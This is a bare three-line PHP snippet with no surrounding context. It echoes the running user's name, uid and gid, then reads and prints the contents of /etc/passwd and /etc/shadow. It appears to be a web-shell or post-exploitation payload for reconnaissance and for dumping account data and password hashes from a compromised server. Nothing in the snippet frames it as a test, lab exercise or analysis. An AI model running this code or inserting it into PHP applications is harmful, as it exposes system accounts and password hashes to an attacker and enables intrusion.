echo "User: ".get_current_user()."uid: ".getmyuid()."gid: ".getmygid();
echo file_get_contents('/etc/passwd');
echo file_get_contents('/etc/shadow');